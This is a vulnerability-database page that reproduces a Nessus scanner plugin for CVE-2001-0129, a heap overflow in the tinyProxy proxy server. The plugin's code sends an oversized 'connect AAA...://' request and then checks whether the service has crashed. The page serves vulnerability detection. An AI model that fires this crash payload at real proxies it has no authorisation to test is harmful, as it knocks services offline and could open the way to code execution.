Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.TINY_PROXY_HEAP_OVERFLOW.NASL
HistoryJan 19, 2001 - 12:00 a.m.

tinyProxy Long Connect Request Overflow

2001-01-1900:00:00
This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
www.tenable.com
77
JSON

It was possible to make the remote service crash by sending it the command :

connect AAA[...]AAAA://

It may be possible for an attacker to execute arbitrary code on this host thanks to this flaw.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10596);
 script_version ("1.26");
 script_cve_id("CVE-2001-0129");
 script_bugtraq_id(2217);
 
 script_name(english:"tinyProxy Long Connect Request Overflow");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote proxy server is affected by a denial of service
vulnerability." );
 script_set_attribute(attribute:"description", value:
"It was possible to make the remote service crash
by sending it the command :

	connect AAA[...]AAAA://

It may be possible for an attacker to execute arbitrary code
on this host thanks to this flaw." );
 script_set_attribute(attribute:"solution", value:
"If you are using tinyProxy, then upgrade to version 1.3.3a, or 
else contact your vendor for a patch." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/01/19");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/01/17");
 script_cvs_date("Date: 2018/08/01 17:36:12");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_summary(english:"proxy server heap overflow");
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"Firewalls");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", "Services/http_proxy", 8888);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

ports = add_port_in_list(list:get_kb_list("Services/http_proxy"), port:8888);
www = get_kb_list("Services/www");
if(!isnull(www))ports = make_list(ports, www);

foreach port (ports)
{
 banner = get_http_banner(port:port);
 if ( banner && "DAAP-Server: iTunes" >< banner ) continue;
 if (! get_port_state(port)) continue;

 if (service_is_dead(port: port) != 0) continue;

 req = strcat('connect ', crap(2048), '://\r\n\r\n');
 r = http_send_recv_buf(port: port, data: req);

 if (service_is_dead(port:port, exit: 0) > 0)
   security_warning(port);
}

Related

openvas 2
cve 1
nessus 1
openvas
openvas
Debian Security Advisory DSA 018-1 (tinyproxy)
2008-01-17 00:00:00
Debian Security Advisory DSA 018-1 (tinyproxy)
2008-01-17 00:00:00
cve
cve
CVE-2001-0129
2001-03-12 05:00:00
nessus
nessus
Debian DSA-018-1 : tinyproxy - remote nobody exploit
2004-09-29 00:00:00
JSON
Related for TINY_PROXY_HEAP_OVERFLOW.NASL
openvas2cve1nessus1